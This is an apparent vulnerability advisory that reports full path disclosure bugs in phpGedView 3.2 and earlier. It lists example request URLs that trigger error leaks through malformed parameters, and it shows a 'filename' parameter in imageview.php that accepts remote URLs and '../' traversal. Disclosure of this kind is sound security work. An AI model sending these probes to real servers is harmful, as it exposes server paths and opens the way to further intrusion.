Multiple full path disclosure in phpGedview 3.2 and prior:
PhpGedview is a web based tree for indexing and ordening all geanologic entries.
a user can look and present the information by diferens querys.
This aplication have various imput validations errors
and reveal some data to remote users.
#######################################################
variable 'level' and 'parent[0]'in file 'placelist.php'
#######################################################
if we change the value of the variable 'level' to other was not exit...
http://[target]/phpGedView/placelist.php?level=01
http://[target]/phpGedView/placelist.php?level=4000000000
(number of error lines show)
if we change the value of the array on variable 'parent[0]' to a non
existen array value...or a letter
http://[target]/phpGedView/placelist.php?action=show&level=1
&parent[1]=Click+edit+and+change+me
http://[target]/phpGedView/placelist.php?action=show
&parent[x]=Misnaged&level=0
http://dismarking.freefronthost.com/phpGedView/placelist.php?
action=find&level=1&parent[x]=Click+edit+and+change+me
here if we change the variable 'level' obtain the error again
http://[target]/phpGedView/placelist.php?action=show&parent[x]=
Misnaged&level=4000 (level=4000 number of error lines show)
we can make some convinations...
###########################################################
variable 'pids[0]' in file timeline.php
###########################################################
if we change the value of the array 'pids[0] to a non existant number
or a letter we found again the error.
http://[target]/phpGedView/timeline.php?pids[x]=I2222
###########################################################
variable not defined in file 'help_text.php'
###########################################################
in this file for make an error we need only a invent a variable
(in the example 'lala')
http://[target]/bin/phpgedview/help_text.php?lala=lala
we get aganin full path disclosure.
############################################################
variable 'filename' in 'imageview.php'
############################################################
variable filename is not validate porperly and permits inport
files to other sites.
http://[target]/imageview.php?filename=http://[remote]/logo.gif
and we can obtain again a full path instalation
http://[target]/imageview.php?filename=../ or some invalid data.
############################################################
change name of lenguage by a number causes a sesion crachses
############################################################
wen we change to another language , in the finish of the url we
have the word of language use.
If we change this value for a numbres we crachs the session,
and full path reveal.
http://[target]/phpGedView/individual.php?pid=I1&ged=pruebas2.ged
&changelanguage=yes&NEWLANGUAGE=1
############################################################
atentamente
Lostmon (lostmon@gmail.com)
thnx to estrella to be my light
thnx to all one that believes in my
La curiosidad es lo que hace mover la mente...